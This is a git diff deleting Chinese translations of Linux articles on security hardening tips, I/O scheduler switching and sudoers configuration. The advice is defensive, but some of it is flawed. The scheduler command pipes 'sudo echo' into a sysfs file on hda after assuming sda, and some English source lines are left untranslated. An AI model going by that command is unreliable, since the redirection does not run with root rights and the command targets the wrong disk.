并每天使用它。如果你真的想要胜过他人,你需要学习如何以编程方式解决问题,并且不认为 Chef 或 Puppet 代码只是配置文件。 每个 IT 专业人员都需要至少掌握编程概念,因为 DevOps 代码至少在某种程度上抽象了 IT 的每个方面。 - -### 4\. 软技能 - -通常,我们在准备职业生涯时所考虑的最后一件事是所谓的 *软技能* - 社交和沟通技巧 - 但是他们可能是最有可能决定你的成功的技能。无论你正在寻找一份新工作,还是试图适应当前职业生涯的变化,软技能是至关重要的。 - -划分 IT 各个领域的线是交错的,并且良好的沟通能力使得这些模糊的线成为一个优点,而不是绊脚石。我们正生活在一个开发人员围绕着服务器,而运维团队编写 Ruby 代码来维护服务器农场的世界里。这些都是 IT 中的大胆的新思想,如果人们不能在不同部门间很好的沟通,工作场所将迅速有敌对气氛。此外,IT 人员总是需要与其他业务领域的人员进行有效沟通。而且,现在比以往有更大的需求。 - - -你计划在 2017 年里添加什么到你的技能中?在评论栏中让我们知道吧。 - --------------------------------------------------------------------------------- - -作者简介: - -![](https://opensource.com/sites/default/files/styles/profile_pictures/public/Shawn%20Powers%20350%20x%20250%20px_2.jpg?itok=6n0E_-Z2) - -Shawn Powers - 自 2009 年起是 CBT Nuggets (www.cbtnuggets.com) 的一名 IT 训练员,专于 Linux、Chef 及为大规模网络集成多个平台。他在 2016 年 12 月发布了一个在线高级 Linux 认证课程(LPIC-2)。 - --------------------------------------------------------------------------------- - -via: https://opensource.com/article/17/1/yearbook-4-hot-skills-linux-pros-2017 - -作者:[Shawn Powers][a] -译者:[geekpi](https://github.com/geekpi) -校对:[jasminepeng](https://github.com/jasminepeng) - -本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 - -[a]:https://opensource.com/users/shawnpowers -[1]:https://www.flickr.com/photos/internetarchivebookimages/14758810172/in/photolist-oubL5m-ocu2ck-odJwF4-oeq1na-odgZbe-odcugD-w7KHtd-owgcWd-oucGPe-oud585-rgBDNf-obLoQH-oePNvs-osVgEq-othPLM-obHcKo-wQR3KN-oumGqG-odnCyR-owgLg3-x2Zeyq-hMMxbq-oeRzu1-oeY49i-odumMM-xH4oJo-odrT31-oduJr8-odX8B3-obKG8S-of1hTN-ovhHWY-ow7Scj-ovfm7B-ouu1Hj-ods7Sg-qwgw5G-oeYz5D-oeXqFZ-orx8d5-hKPN4Q-ouNKch-our8E1-odvGSH-oweGTn-ouJNQQ-ormX8L-od9XZ1-roZJPJ-ot7Wf4 -[2]:https://opensource.com/tags/security -[3]:https://opensource.com/tags/devops diff --git a/translated/tech/20170104 50 ways to avoid getting hacked in 2017 copy.md b/translated/tech/20170104 50 ways to avoid getting hacked in 2017 copy.md deleted file mode 100644 index f0dcdd6251..0000000000 --- a/translated/tech/20170104 50 ways to avoid getting hacked in 2017 copy.md +++ /dev/null @@ -1,194 +0,0 @@ -2017年系统免遭黑客侵袭的50种方法 -============================================================ - -### Paul Simon 概括了“与爱人分手的50法”,而这里,我们提供了提高系统安全性的50种方法。 - - ![secure your systems](https://opensource.com/sites/default/files/styles/image-full-size/public/images/business/rh_003601_05_mech_osyearbook2016_security_cc.png?itok=VNmpz6K- "secure your systems") - -图片来自:  - -Opensource.com - -当我还是小孩子,耳畔萦绕着流行歌[与爱人分手的50法][3](Paul Simon)。当我渐渐地长大,突然受歌的启发,收集了50种方法,免得你——门内汉和门外汉——遭受黑客侵袭啊: -### "你刚刚从后头溜出去了,杰克" - -1\. 备份你的数据。如果你不幸被勒索软件光顾,那么你就不用付出任何代价,因为你做了备份。 - -2\. 当你需要在公共场所为你的手机充电,那就使用[sysncstop][4]吧,或者你也可以用你的备份电池。 - -3\. 利用好你的审计子系统,里头有好多很酷的工具可以帮助你监控系统。如果你确实遭到了入侵,那么审计系统也许就可以告诉你发生了什么,以及攻击者做了些什么。 - -4\. 说到日志,把日志分流到集中式服务器上总是一个不错的想法,因为如果某个黑客侵入你的系统里,他首先要攻击的就是日志系统以便隐藏他的踪迹。构建一个好的入侵检测系统来监控日志,这对于防范黑客也很有帮助。 - -### "做份新的计划吧,斯坦" - -5\. 以强制模式运行 SELinux(见 [stopdisablingselinux.com][5])。没想到它会花费我这么长时间来达到那个目的? SELinux 可以防止 0 day 漏洞的升级。当 [Shell Shock][6] 漏洞出现的时候,SELinux是曾唯一的防护手段。 - -6\. 如果可能,在 [SELinux 沙盒][7]中运行应用程序吧——在容器冷却前,它还是个容器。同时,请遵循 [Flatpack][8] 开发,这个工具很快会开发沙盒功能。 - -7\. 不要安装或者使用 Flash。Firefox 不再支持它了,同时也希望大多数 web 服务器正在远离它。 - -8\. 使用 [定义的 SELinux 用户][9]来控制它们在系统中所做的事。如果你正运行着一台共享登陆的系统,设置用户为 **guest_t**。 - -### "你不必害羞,罗伊" - -9\. 利用 [systemd 工具][10]来帮助你提升系统安全。大多数系统攻击是通过监听网络上的服务来实现的,而 Systemd 提供了一些很棒的方法来锁定服务。例如,使用 **[PrivateTmp=yes][1]** 。Privatemp 利用挂载命名空间来为服务器的 **/tmp** 设置一个私有的 **tmpfs** 挂载,这可以阻止被入侵的服务访问到主机 **/tmp** 中的内容,以及潜在的针对基于监听 **/tmp** 的服务的系统其它剩余部分的攻击。 - -10. **InaccessibleDirectories=/home** 是一个 systemd 单元的标记,它使用挂载命名空间来从服务视图中消除 **/home**(或者其它任何目录),这会使得被入侵的服务攻击内容更为困难。 - -11. **ReadOnlyDirectories=/var** 是另外一个 systemd 单元的标记,它使用挂载命名空间来将目录内容变成只读模式。你可能总是应该以**只读模式**运行 **/usr** 。这可以阻止一个被入侵的应用程序重写二进制文件,因为那可以在下次服务重启时,保持服务被入侵状态。 - -12\. 降低服务权限(**CapabilityBoundingSet=CAP_CHOWN CAP_KILL**)。在内核中,特权服务被分解成一些列不同的权限。大多数服务不需要很多(如果需要),而 systemd 提供了一个简单的开关来降低服务中的这些权限。 - -13\. 如果服务不使用网络,那么你可以使用 **PrivateNetwork=yes** 来为该服务关闭网络功能。只需在服务的单元文件中开启,就可以享受它带来的好处,关闭服务所有可能访问到的网络。黑客常常并不是真的想入侵你的机器——他只是想用它作为攻击服务器来攻击其它机器。如果服务不连上网络,那么就不会受到攻击。 - ->控制服务可用的设备 - -14\. 控制服务可用的设备。 Systemd 提供了 **DeviceAllow** 指针,它控制了服务可用的设备。**DeviceAllow=/dev/null rw** 将访问限制为 **/dev/null**,仅可访问该设备节点,不允许对其它任何设备节点的访问。该功能部署在设备的 cgroup 控制器顶端。 - -15\. Systemd 系统即将迎来的一个新功能是 **[ProtectSystem Strict][2]**,该功能可以开启所有这些名命名空间以完全锁定服务运行的环境。 - -### "刚刚重获自由" - -16\. 不要使用没有运行着 SELinux([SEAndroid][11])强制模式的手机。幸运的是,我听说目前超过 90% 的安卓手机都运行着 SEAndroid 的强制模式,这真让我高兴。现在要是我们能让那些果粉们使用 SELinux 就好了。 - ->只从受信源安装软件。 - -17\. 只从受信源安装软件。不要安装你从因特网找来的危险东西,对于你的手机、计算机系统、虚拟机以及容器等等也一样。 - -18\. 我不会在我的手机上进行网上银行操作——我只在我的 Linux 计算机上做这事儿。如果黑客偷了我的信用卡,也许我就丢了那么 50 美元;而如果他黑进我的银行账户,那我丢的钱就会更多。我想我是个老古板。(滚出我的地盘。) - -19\. 我用我手机做的一件很酷的事情,就是设置让我的信用卡公司每次在我的信用卡记账时给我发送文本信息。那样的话,如果账号被盗,我会更快地知道。 - ->我不会在我的手机上进行网上银行操作——我只在我的 Linux 计算机上做这事儿。 - -20\. 当你需要安全地通讯,请使用[信号安全信息应用][12]. - -### "搭个便车,格斯" - -21\. 在你的计算机系统上运行 Linux。当我第一次用一台计算机系统连上我父亲的计算机时,我就在他的系统受病毒感染前直接回家了。我回去,给他的系统安了个 Linux,而他从那以后就一直运行着它。我相信 Linux 大体上说是一个更加安全的系统,因为它的设计方式。而且我也相信这个桌面被黑的可能性也相对较小,因为用它的人相对较少。有些人或许要持反对意见了,他们会说 Windows 在过去几年中已经有了很大的改进了,但对于我而言,我仍然坚持己见。 - -22\. 只运行那些有[安全反应团队][13]进行安全监管的发行版。企业软件及其重要。 - -23\. 运行一个企业级内核。在容器中,单点故障往往是内核。如果你想要保证它安全,那么就使用一个企业级内核,即便它不是一个最新的版本,但这也意味着包含了最新的安全补丁。记住,最新的内核虽然带来了最新的安全补丁,但是它也带来了大量的新代码,这些代码可能存在漏洞。 - -### "你不要说太多" - -24\. 大多数非法入侵都是通过社会工程学实施的——例如,电子邮件链接,web 浏览器攻击,以及电话。对于此,最好的选择是接受相关教育,并且对一切留个心眼儿。没有哪个来自尼日利亚的家伙会给你钱。美国国税局也不会打电话到你家问你要钱。如果你电子邮件收到了来自你银行的电子邮件,里面包含有到某个网站的链接,那么不要直接去点击那个链接,在 web 浏览器中输入那个地址来打开。 - -25\. 总是把你的系统打上最新的安全补丁。已知有安全漏洞以及过时的系统的数量十分可怕,脚本小子们依赖于你**不**更新系统。 - ->总是把你的系统打上最新的安全补丁。 - -26\. 当连接到网络上的服务时,请始终使用 HTTPS。Chrome 和 Firefox 现在已经开启了强制模式。到 2016 年为止,那些还不支持安全通讯的网站可能就不值得你们访问。 - -27\. 在你的容器中使用 [seccomp][14],这会限制针对内核表面的攻击,这只是单点故障。限制什么进程可以会话。 - -### "就把那钥匙丢下吧,李" - -28\. 使用 [YubiKey][15] 来存储私钥。 - -29\. 加密你系统上的数据。至少对于笔记本而言,应该把**家目录**以及你的其它数据目录加密。几年前,我正乘坐在伦敦的地铁上,我的笔记本就成了某些人的目标——我下了车,车门关上了,而我发现我的笔记本不见了。此时,地铁已经驶出了站台。幸运的是,我把磁盘加密了。 - -30\. 给你的所有网站用上 [Let's Encrypt][16] 吧,没有任何理由不再运行 HTTPS 了。 - -31\. 绝不要在不同 web 服务器上使用相同的密码。虽然这个很难不落入陷阱,但是像 Let's Encrypt 这样的工具会有很大帮助。如果你使用 ssh 密钥来登陆进系统,这会更好。 - -32\. 使用双因素认证(2FA)。密码变得无关紧要,使用 Yubieys 以及诸如此类的工具可以使得双因素认证很方便,我们都有手机。在手机中生成一个密钥,并把秘密藏在你的大脑中,总是比一个密码来得更好。 - -33\. 网站总要我设置帐号,没有比这更激怒我的事情了——我们就不能做得更好点?对于网站密码,始终都要使用密码生成工具来生成。我是个保守派:我使用 [Password Safe][17] 来生成密码,然后剪切粘贴到 web 浏览器中。我听说,其他人使用 [LastPass][18],或者其它整合在手机和 web 服务中的工具也用着不错。 - -34\. 配置像 [FreeIPA][19] 之类的服务,用于身份认证。使用像 [Kerberos][20] 之类的工具来认证和授权,会使得跟踪雇员和他们对系统的访问更为简便(而且它也有很酷的加密服务)。使用活动目录也很不错,或许我有点偏颇。 - ->如果你经常输入密码,那就使用一个容易记忆的句子,而不是一个单词。 - -35\. 如果你经常输入密码,那就使用一个容易记忆的句子,而不是一个单词。我所偏好的用于记忆密码的方式,就是使用几个单词长度并且易于输入的词组。 - -### "让自己自由" - -36\. 使用 [USBGuard][21] 来保护你的系统免遭流氓 USB 设备破坏。 - -37\. 在过去几年中,我一直工作在容器中,让我们来说说容器的安全吧。首先,让它们在开启强制模式的 SELinux 的系统中运行。如果你的系统不支持 SELinux,那就换个支持它的版本吧。SELinux 是使用文件系统来保护容器免遭破坏的最佳工具。 - -38\. 如果可能,在容器中跑你的服务吧。我相信,使用 [OCI Image Format][22] 和 Linux 容器技术是应用的未来。用 [runC][23],OCID,RKT,Systemd-nspawn 等等应用来启动这些容器。虽然我常常说“容器并不包容“,但是这些服务确实在容器外运行时要比容器内好。 - -39\. 在虚拟机中运行容器。虚拟机提供比容器更好的隔离机制,在虚拟机中跑像容器之类的东西,更加灵活有弹性,并且互相隔离。 - -40\. 在不同的虚拟中,按不同的安全需求跑容器应用。你可以在 DMZ 中的虚拟机上跑 web 服务容器,而在 DMZ 外的虚拟机上跑数据容器。 - -41\. 同时,记得在不同的物理机上跑需要最高安全性的虚拟机,并且抛在在容器内的不同虚拟机上(这也叫深度防护)。 - -42\. 以[只读模式][24]跑容器。开发环境中的容器需要能够写入到 **/usr**,但是生产环境中的容器只能写入到 **tmpfs**,并且将卷挂载到容器中。 - -43\. [降低容器权限][25]。不管是在容器中,还是在容器外,我们都以比它们所需的更多的“权限”跑它们的进程,你可以通过降低权限来让你的进程更加安全。 - -44\. [不要以 root 身份在容器中跑进程][26]。大多数服务都不需要 root 特权,或者它们需要该权限来绑定到 < 1024 的端口,然后切换到非 root 用户。我会建议你始终以非 root 身份来跑应用。 - -45\. 给你的容器打上最新的 CVE 补丁。使用像 OpenShift 这样的工具来构建并维护你的容器镜像是个不错的主意,因为它会在新的安全补丁出现时自动重构容器镜像。 - -46\. 我的一个同事说“Docker 就是用来在你的主机上以 root 身份运行来在因特网的随机代码的。”从一个受信源获取软件,不要随意在 docker.io 上抓取第一个 Apache 应用。[操作系统有重要关系][27]。 - -47\. 在一台受限的容器化优化的主机上跑生产环境容器,例如在一台[原子主机][28]上,它开启了所有安全特性,为运行中的容器而优化,带有受限的攻击表层和原子更新。有什么不喜欢那儿的吗? - -48\. 使用像 [OpenScap][29] 这样的工具来扫描你系统的漏洞。糟糕的是,新的漏洞总是层出不穷,所以你得时刻更新你的扫描器。(也可以看看 [atomic scan][30],用于扫描你的容器。) - -49\. OpenScap 也具有扫描[安全配置][31]的功能,如 STIG(安全技术部署指南)。 - -50\. 为你孩子收到的所有那些圣诞物联网设备设置一个特别的客户网络。我钟爱我的 Amazon Echo,还有自动化灯以及电源开关(“亚力克沙,打开圣诞灯“),但是所有这些都是由可能存在安全问题的 Linux 操作系统控制。 - -### "一定还有着另外 50 种免遭黑客侵害的方法" - -你会为这个列表添加点什么呢?在下面的评论中告诉我们吧。 - -_Josh Bressers 对本文作出贡献。_ - --------------------------------------------------------------------------------- - -作者简介: - -![](https://opensource.com/sites/default/files/styles/profile_pictures/public/walsh1.jpg?itok=JbZWFm6J) - -Daniel J Walsh - Daniel Walsh 已经致力于计算机安全领域将近 30 年。Dan 在 2001 年 8 月份加入 Red Hat。 - --------------------------------------------------------------------------------- - -via: https://opensource.com/article/17/1/yearbook-50-ways-avoid-getting-hacked - -作者:[Daniel J Walsh][a] -译者:[GOLinux](https://github.com/GOLinux) -校对:[校对者ID](https://github.com/校对者ID) - -本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 - -[a]:https://opensource.com/users/rhatdan -[1]:http://danwalsh.livejournal.com/51459.html -[2]:https://www.phoronix.com/scan.php?page=news_item&px=systemd-New-Protect-Tunables -[3]:https://www.youtube.com/watch?v=0H5chfbcWtY -[4]:http://syncstop.com/ -[5]:http://stopdisablingselinux.com/ -[6]:http://danwalsh.livejournal.com/71122.html -[7]:http://danwalsh.livejournal.com/31146.html -[8]:http://flatpak.org/ -[9]:http://danwalsh.livejournal.com/37404.html -[10]:http://0pointer.de/blog/projects/security.html -[11]:https://source.android.com/security/selinux/ -[12]:https://whispersystems.org/ -[13]:https://access.redhat.com/blogs/766093/posts/2695561 -[14]:https://lwn.net/Articles/656307/ -[15]:https://www.yubico.com/ -[16]:https://letsencrypt.org/ -[17]:https://pwsafe.org/ -[18]:https://www.lastpass.com/ -[19]:https://www.freeipa.org/page/Main_Page -[20]:https://web.mit.edu/kerberos/ -[21]:https://github.com/dkopecek/usbguard -[22]:https://www.opencontainers.org/ -[23]:https://runc.io/ -[24]:http://www.projectatomic.io/blog/2015/12/making-docker-images-write-only-in-production/ -[25]:http://rhelblog.redhat.com/2016/10/17/secure-your-containers-with-this-one-weird-trick/ -[26]:https://www.projectatomic.io/blog/2016/01/how-to-run-a-more-secure-non-root-user-container/ -[27]:https://opensource.com/16/12/yearbook-why-operating-system-matters -[28]:https://access.redhat.com/articles/rhel-atomic-getting-started -[29]:https://www.open-scap.org/ -[30]:https://developers.redhat.com/blog/2016/05/02/introducing-atomic-scan-container-vulnerability-detection/ -[31]:https://www.open-scap.org/security-policies/scap-security-guide/ diff --git a/translated/tech/20170104 How to change the Linux IO scheduler to fit your needs.md b/translated/tech/20170104 How to change the Linux IO scheduler to fit your needs.md deleted file mode 100644 index 045f93d101..0000000000 --- a/translated/tech/20170104 How to change the Linux IO scheduler to fit your needs.md +++ /dev/null @@ -1,96 +0,0 @@ -如何更改Linux I/O 调度器来满足你的需求 -============================================================ - -为了从 Linux 服务器尽可能多地榨取性能,请了解如何更改 I/O 调度器以满足你的需求。 - - ![](http://tr1.cbsistatic.com/hub/i/r/2016/05/04/f765c3c7-ee08-4f3a-876a-66137ad4e6df/resize/770x/131c6931386ecf37104e8ada8d01e903/hackershero.jpg) - - -Linux I/O 调度器控制内核提交读取和写入磁盘的方式。自从 2.6 内核以来,管理员已经能够更改调度器,所以他们可以自定义他们的平台以完全适合他们的需要。 - -有三个调度器可供选择,每个调度器都有其优点。这些调度器是: - -* **CFQ(cfq):** 许多 Linux 发行版的默认调度器;它将由进程提交的同步请求放到多个进程队列中,然后为每个队列分配时间片以访问磁盘。 -* **Noop调度器(noop):** 基于先入先出(FIFO)队列概念的 Linux 内核最简单的 I/O 调度器。此调度程序最适合于SSD。 -* **截止时间调度器(deadline):** 尝试保证请求的开始服务时间。 - - -当你想要利用 Linux 驱动的机器来获得最佳性能时,这可能是你所要做的事情之一。幸运的是,更改 I/O 调度器非常简单。让我告诉你怎么做。 - -### 找出你有的调度器 - -The first thing you need to do is find out which scheduler is handling I/O on your system. This is done from the command line, and you must know the name of your disk. For simplicity sake, I'll assume the disk is question is sda. With that information in hand, open a terminal window and issue the following command: -你需要做的第一件事是找出哪个调度器正在处理系统上的 I/O。这是从命令行完成的,你必须知道磁盘的名称。为简单起见,我假设磁盘是 sda。使用该信息,打开终端窗口并输入以下命令: - -``` -cat /sys/block/sda/queue/scheduler -``` - -该命令的结果将显示当前运行的调度程序(**图 A**)。 - -**图 A** - - ![Figure A](http://tr3.cbsistatic.com/hub/i/2017/01/03/abba7f22-3252-4b76-91c0-bb15630fd42c/6b4a6d971202b70926b2d991e6c9afe3/schedulera.jpg) - -Elementary OS Loki 运行 noop 调度器。 - -### 更改你的调度器 - -你可以通过两种方式更改你的调度器:即时或永久。如果你随时更改调度器,它可以恢复到默认调度器(重启后)。你可能希望首先进行即时更改,以查看哪个调度器能为你的需求带来最佳性能。 - -说到你要即时改到 noop 调度器。 为此,输入以下命令: - -``` -sudo echo noop > /sys/block/hda/queue/scheduler -``` - -你可以将 _noop_ 更改为 _cfq_ 或 _deadline_。 - -此更改可以在不重新启动计算机的情况下完成。 一旦更改,I/O 调度器将会切换,(希望)你能看到性能提高(再说一次,根据你的需要而定)。 - -如果要将调度器更改为永久,则必须在 GRUB 配置文件中执行此操作。 为此,请输入 sudo nano /etc/default/grub,然后修改下面的行: - -``` -GRUB_CMDLINE_LINUX_DEFAULT="quiet splash" -``` - -到 - -``` -GRUB_CMDLINE_LINUX_DEFAULT="quiet splash elevator=noop" -``` - -同样,你可以改变 noop 到任何你需要的调度器。如果你用的是即时修改,则不必重新启动以使新调度器生效。 - -这些就是修改调度器的方法了。 - -### 做出明智的选择 - -你应该做研究,找出什么调度器最适合你的特殊情况。要了解每个调度器的更多信息,请查看这些 Wiki 页面:[CFS][7]、[Noop][8]和 [Deadline][9]。 - - --------------------------------------------------------------------------------- - -via: http://www.techrepublic.com/article/how-to-change-the-linux-io-scheduler-to-fit-your-needs/ - -作者:[Jack Wallen ][a] -译者:[geekpi](https://github.com/geekpi) -校对:[校对者ID](https://github.com/校对者ID) - -本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 - -[a]:http://www.techrepublic.com/meet-the-team/us/jack-wallen/ -[1]:http://www.techrepublic.com/article/why-the-earliest-open-source-licenses-are-still-the-most-relevant/ -[2]:http://www.techrepublic.com/article/raspberry-pi-in-2017-new-boards-new-oses-and-more/ -[3]:http://www.techrepublic.com/article/open-source-predictions-for-2017/ -[4]:http://www.techrepublic.com/newsletters/ -[5]:http://www.techrepublic.com/article/how-to-change-the-linux-io-scheduler-to-fit-your-needs/#postComments -[6]:http://www.techrepublic.com/article/open-source-predictions-for-2017/ -[7]:https://en.wikipedia.org/wiki/Completely_Fair_Scheduler -[8]:https://en.wikipedia.org/wiki/Noop_scheduler -[9]:https://en.wikipedia.org/wiki/Deadline_scheduler -[10]:http://intent.cbsi.com/redir?tag=medc-content-top-leaderboard&siteId=11&rsid=cbsitechrepublicsite&pagetype=article&sl=en&sc=us&topicguid=0aed1ce4-8606-11e2-a661-024c619f5c3d&assetguid=b1120b55-9a41-4a43-b0c6-23f7beb58c5b&assettype=content_article&ftag_cd=LGN3588bd2&devicetype=desktop&viewguid=d21156e0-d86f-11e6-85ae-35117859b3ea&q=&ctype=docids;promo&cval=33159110;7205&ttag=&ursuid=&bhid=&destUrl=http%3A%2F%2Fwww.techrepublic.com%2Fresource-library%2Fwhitepapers%2Fthe-web-developer-bootcamp%2F%3Fpromo%3D7205%26ftag%3DLGN3588bd2%26cval%3Dcontent-top-leaderboard -[11]:http://intent.cbsi.com/redir?tag=medc-content-top-leaderboard&siteId=11&rsid=cbsitechrepublicsite&pagetype=article&sl=en&sc=us&topicguid=0aed1ce4-8606-11e2-a661-024c619f5c3d&assetguid=b1120b55-9a41-4a43-b0c6-23f7beb58c5b&assettype=content_article&ftag_cd=LGN3588bd2&devicetype=desktop&viewguid=d21156e0-d86f-11e6-85ae-35117859b3ea&q=&ctype=docids;promo&cval=33159110;7205&ttag=&ursuid=&bhid=&destUrl=http%3A%2F%2Fwww.techrepublic.com%2Fresource-library%2Fwhitepapers%2Fthe-web-developer-bootcamp%2F%3Fpromo%3D7205%26ftag%3DLGN3588bd2%26cval%3Dcontent-top-leaderboard -[12]:http://www.techrepublic.com/rssfeeds/topic/data-centers/ -[13]:http://www.techrepublic.com/meet-the-team/us/jack-wallen/ -[14]:https://twitter.com/intent/user?screen_name=jlwallen diff --git a/translated/tech/20170107 10 Useful Sudoers Configurations for Setting sudo in Linux.md b/translated/tech/20170107 10 Useful Sudoers Configurations for Setting sudo in Linux.md deleted file mode 100644 index 0eb1c32d02..0000000000 --- a/translated/tech/20170107 10 Useful Sudoers Configurations for Setting sudo in Linux.md +++ /dev/null @@ -1,246 +0,0 @@ -Linux 中设置 ‘sudo’ 的十条使用的 Sudoers 配置 -=================== - -在 Linux 和其他的类 Unix 操作系统中,只有 root 用户可以运行所有的命令,以及在系统中执行那些需要鉴权的操作,比如安装、升级和移除软件包、[创建用户和用户组][1]、修改系统重要的配置文件等等。 - -然而,作为使用 root 用户角色的系统管理员可以通过 [sudo 命令][2] 和一些配置选项来给普通用户进行授权,从而让该普通用户可以运行某些命令已经上述的那些相当重要的系统级操作。 - -另外,系统管理员还可以共用 root 用户密码 (这个做法是不值得提倡的),这样普通用户就可以通过 su 命令来转化为 root 用户角色。 - -sudo 允许已授权用户按照指定的安全策略、以 root 用户 (或者是其他的用户角色) 权限来执行某个命令。 - -1. sudo 会读取和解析 /etc/sudoer 文件、查找调用命令的用户及其权限。 -2. 然后提示调用命令的用户输入密码 (通常是用户密码,但也可能是目标用户的密码。也可以通过 NOPASSWD 标志来跳过密码验证)。 -3. after that, sudo creates a child process in which it calls setuid() to switch to the target user -4. next, it executes a shell or the command given as arguments in the child process above. - -一下列出十个 /etc/sudoers 文件配置,使用默认入口来执行 sudo 命令是会有不同的动作。 - -``` -$ sudo cat /etc/sudoers -``` - -/etc/sudoers 文件 -``` -# -# This file MUST be edited with the 'visudo' command as root. -# -# Please consider adding local content in /etc/sudoers.d/ instead of -# directly modifying this file. -# -# See the man page for details on how to write a sudoers file. -# -Defaults env_reset -Defaults mail_badpass -Defaults secure_path="/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin" -Defaults logfile="/var/log/sudo.log" -Defaults lecture="always" -Defaults badpass_message="Password is wrong, please try again" -Defaults passwd_tries=5 -Defaults insults -Defaults log_input,log_output -``` - -#### 默认入口的类型 - -``` -Defaults parameter, parameter_list #对任意主机登录的所有用户起作用 -Defaults@Host_List parameter, parameter_list #对指定主机登录的所有用户起作用 -Defaults:User_List parameter, parameter_list #对指定用户起作用 -Defaults!Cmnd_List parameter, parameter_list #对指定命令起作用 -Defaults>Runas_List parameter, parameter_list #对指定目标用户运行命令起作用 -``` - -在本文讨论范围内,我们下面的将以第一个 Defaults 作为基准来参考。Parameter 可以是标记 (flags)、整数值或者是列表 (lists)。 - -值得注意的是,标记 (flag) 是指布尔类型值,可以使用 `'!'` 操作符来进行取反,列表 (lists) 有两个赋值运算符:`+=` (添加到列表) and `-=` (从列表中移除)。 - -``` -Defaults parameter -或 -Defaults parameter=值 -或 -Defaults parameter -=值 -Defaults parameter +=值 -或 -Defaults !parameter -``` - -### 1\. 安置一个安全的 PATH - -该 PATH 应用于每个通过 sudo 执行的命令,需要注意两点: - -1. 当系统管理员不信任 sudo 用户,便可以设置一个安全的 PATH 环境变量。 -2. 该设置将 “root PATH” 和 “user PATH” 分离,只有在 exempt_group 组的用户不受该设置的影响。 - -可以添加一下内容来设置: - -``` -Defaults secure_path="/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin" -``` - -### 2\. 启用允许 tty 用户回话使用 sudo - -该设置允许在一个真实的 tty 中进行调用,但不允许通过 cron 或者 cgi-bin 脚本等方法来调用。添加一下内容来设置: - -``` -Defaults requiretty -``` - -### 3\. 使用 pty 运行 sudo 命令 - -少数情况下,攻击者可以通过 sudo 来运行一个而已程序 (比如病毒或者恶意代码),这种恶意程序可能会复制一个后台运行的进程,即时主程序完成执行,它仍能够运行在用户的终端设备上。 - -为了防止出现这样的情况,你可以通过 `use_pty` 参数来设置 sudo 使用伪终端来运行其他命令,而不必管 I/O 登录的开启状态。如下: - -``` -Defaults use_pty -``` - -### 4\. 创建 sudo log 文件 - -默认下,sudo 通过 syslog(3) 来记录到 logs。但是我们可以通过 logfile 参数来指定一个自定义的 log 文件。如下: - -``` -Defaults logfile="/var/log/sudo.log" -``` - -使用 use log_host 和 log_year 参数可以对应记录登录主机名和 4 位数年份到自定义 log 文件。如下: - -``` -Defaults log_host, log_year, logfile="/var/log/sudo.log" -``` - -下面是自定义 sudo log 文件的例示: - -[![Create Custom Sudo Log File](http://www.tecmint.com/wp-content/uploads/2017/01/Create-Sudo-Log-File.png)][3] - -创建 sudo log 文件 - -### 5\. 记录 sudo 命令的输入/输出 - -log_input 和 log_output 参数可以让 sudo 命令运行在伪终端,并可以对应的记录所有用户在屏幕上的输入和输出。 - -默认的 I/O log 目录为 /var/log/sudo-io,如果存在一个会话的话,它将被存储到该目录。你可以通过 iolog_dir 参数来指定一个目录. - -``` -Defaults log_input, log_output -``` - -这其中支持转义字符,像 `%{seq}` —— 以 36 为基数的单调递增序列,比如 000001,这里每两个数字都分别用来形成一个新目录。请看下边例示 00/00/01: - -``` -$ cd /var/log/sudo-io/ -$ ls -$ cd 00/00/01 -$ ls -$ cat log -``` - -[![Log sudo Input Output](http://www.tecmint.com/wp-content/uploads/2017/01/Log-sudo-Input-Output.png)][4] - -记录 sudo 命令的输入/输出 - -[cat 命令][5] 来查看 该目录的其余部分。 - -### 6\. 为 sudo 用户提示命令用法 - -如下,使用 lecture 参数可以在系统中为 sudo 用户提示命令的用法: - -参数属性值有三个选择: - -1. always – 一直提示 -2. once – 用户首次运行 sudo 时提示 (未指定参数属性值时的默认值) -3. never – 从不提示 - -``` -Defaults lecture="always" -``` - -此外,你还可以使用 lecture_file 参数类自定义提示内容,在指定的文件中输入适当的提示内容即可: - -``` -Defaults lecture_file="/path/to/file" -``` - -[![Lecture Sudo Users](http://www.tecmint.com/wp-content/uploads/2017/01/Lecture-Sudo-Users.png)][6] - -为 sudo 用户提示命令用法 - -### 7\. 输入错误的 sudo 密码是显示自定义信息 - -当某个用户输错密码时,会有一个对应的信息显示在屏幕上。默认是“抱歉,请重新尝试。(sorry, try again)”,你可以通过 badpass_message 参数来修改该信息: - -``` -Defaults badpass_message="Password is wrong, please try again" -``` - -### 8\. 增加 sudo 密码尝试限制次数 - -passwd_tries 参数用于指定用户尝试输入密码的次数。 - -默认为 3。 - -``` -Defaults passwd_tries=5 -``` - -[![Increase Sudo Password Attempts](http://www.tecmint.com/wp-content/uploads/2017/01/Increase-Sudo-Password-Attempts.png)][7] - -增加 sudo 密码尝试限制次数 - -使用 passwd_timeout 参数设置密码超时 (默认为 5 分钟),如下: - -``` -Defaults passwd_timeout=2 -``` - -### 9\. 在输错密码时让 sudo 羞辱用户 - -使用了 insults 参数之后,一旦你输出了密码,sudo 便会在命令窗口中显示羞辱你的信息。这个参数会自动关闭 badpass_message 参数。 - -``` -Defaults insults -``` - -[![Let's Sudo Insult You When Enter Wrong Password](http://www.tecmint.com/wp-content/uploads/2017/01/Sudo-Insult-Message.png)][8] - -在输错密码时让 sudo 羞辱用户 - -### 10\. 更多关于 sudo 的配置 - -此外,欲了解更多 sudo 命令的配置,请自行阅读:[su 与 sudo 的差异以及如何配置 sudo][9]。 - -文毕。你也可以在评论区分享其他有用的 sudo 配置或者 [Linux 技巧][10]。 - ---------------------------------------------------------------------- - -作者简介:Aaron Kili 是一名 Linux 和 F.O.S.S 忠实拥护者、高级 Linux 系统管理员、Web 开发者,目前在 TecMint 是一名活跃的博主,热衷于计算机并有着强烈的只是分享意愿。 - -![](http://1.gravatar.com/avatar/4e444ab611c7b8c7bcb76e58d2e82ae0?s=128&d=blank&r=g) - -译者简介:[GHLandy](http://GHLandy.com) —— 欲得之,则为之奋斗 (If you want it, work for it.)。 - -![GHLandy](http://GHLandy.com/images/GHLandy.ico) - ---------------------------------------------------------------------- - -via: 